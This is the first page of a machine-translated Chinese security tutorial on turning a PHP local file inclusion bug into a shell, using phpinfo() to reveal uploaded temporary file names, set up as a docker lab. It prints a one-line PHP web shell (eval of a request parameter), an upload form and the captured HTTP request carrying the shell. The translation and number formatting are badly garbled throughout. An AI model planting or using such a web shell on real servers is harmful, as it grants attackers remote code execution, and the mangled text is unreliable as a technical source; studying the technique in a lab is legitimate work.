PHP local file inclusion vulnerability environment to build and use-vulnerability and early warning-the black bar safety net

2016-03-16T00:00:00
ID MYHACK58:62201672623
Type myhack58
Reporter 佚名
Modified 2016-03-16T00:00:00

Description

0x00 description


php local file inclusion vulnerability related to knowledge, the dark clouds on the earlier to have appropriate articles, lfi with phpinfo earliest by large foreign cattle raised, reference the following two articles. The use of the principle is to use the php post to upload file produces a temporary file, the phpinfo()reads the temporary file path and name, the local contains a vulnerability generate 1 sentence the back door.

This way in the local test is successful, in order to facilitate learning, reduce learning costs, it has been building the docker environment, easy to test. Will building good docker put abroad the VPS, use the github project lfi_phpinfo in the poc folder of the script, running locally, you can still getshell it. Described this way is feasible, the network requirements are not very high.

> The source code stored in the code directory, you can use docker to reproduce, poc directory storage use the script

paper:

<http://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf>

<http://www.insomniasec.com/publications/LFI%20With%20PHPInfo%20Assistance.pdf>

0x01 php upload


To server any php file in post request to upload a file, will generate temporary files, can be directly in the phpinfo page to find the temporary file path and name.

  • post upload file

php post method uploads any file, the server will create a temporary file to save the contents of a file.

In the HTTP Protocol to facilitate file transfer, provides a form-based HTML file transmission method

Wherein to ensure that the upload form attribute enctype=”multipart/form-data, you must use the POST see: php file-upload. post-method

Where the PHP engine to enctype=”multipart/form-data”this request process is as follows:

  1. Request arrives
  2. Create temporary file and write the uploaded file contents
  3. Call the appropriate PHP script for processing, such as verification of name, size, etc.
  4. Delete the temporary file

The PHP engine will first the contents of the file saved to a temporary file, and then perform the appropriate action. The temporary file name is php+random characters.

  • $_FILES information, including temporary files path, name,

In PHP, there is a super-global variable$_FILES,save Upload file information, including file name, type, temporary file name, error code, size

0x02 manual test phpinfo()to get temporary file path


  • html form

File upload.html

|

1

2

3

4

5

6

7

8

9

1 0

1 1

|

<! doctype html>

<html>

<body>

<form action="phpinfo.php" method="POST" enctype="multipart/form-data">

<h3> Test upload tmp file</h3>

<label for="file">Filename:</label>

<input type="file" name="file"/><br/>

<input type="submit" name="submit" value="Submit" />

</form>

</body>

</html>

---|---

  • Browser access upload.html, Upload File file.txt

1

2

3

|

<? php

eval($_REQUEST["cmd"]);

?& gt;

---|---

  • burp view POST the following information

1

2

3

4

5

6

7

8

9

1 0

1 1

1 2

1 3

1 4

1 5

1 6

1 7

1 8

1 9

2 0

2 1

2 2

2 3

2 4

|

POST /LFI_phpinfo/phpinfo.php HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/2 0 1 0 0 1 0 1 For Firefox/44.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://127.0.0.1/LFI_phpinfo/upload.html

Connection: close

Content-Type: multipart/form-data; boundary=---------------------------1 1 0 0 8 9 2 1 0 1 3 5 5 5 4 3 7 8 6 1 0 1 9 6 1 5 1 1 2

Content-Length: 3 6 8

-----------------------------1 1 0 0 8 9 2 1 0 1 3 5 5 5 4 3 7 8 6 1 0 1 9 6 1 5 1 1 2

Content-Disposition: form-data; name="file"; filename="file.txt"

Content-Type: text/plain

<? php

eval($_REQUEST["cmd"]);

?& gt;

-----------------------------1 1 0 0 8 9 2 1 0 1 3 5 5 5 4 3 7 8 6 1 0 1 9 6 1 5 1 1 2

Content-Disposition: form-data; name="submit"

Submit

-----------------------------1 1 0 0 8 9 2 1 0 1 3 5 5 5 4 3 7 8 6 1 0 1 9 6 1 5 1 1 2--

---|---

  • Browser to access the phpinfo returns the following information:

1

2

3

4

5

6

7

8

9

1 0

1 1

1 2

1 3

1 4

1 5

|

_REQUEST["submit"]

Submit

_POST["submit"]

Submit

_FILES["file"]

Array

(

[name] => file.txt

[type] => text/plain

[tmp_name] => /tmp/phpufdCHh

[error] => 0

[size] => 3 3

)

---|---

[1] [2] [3] next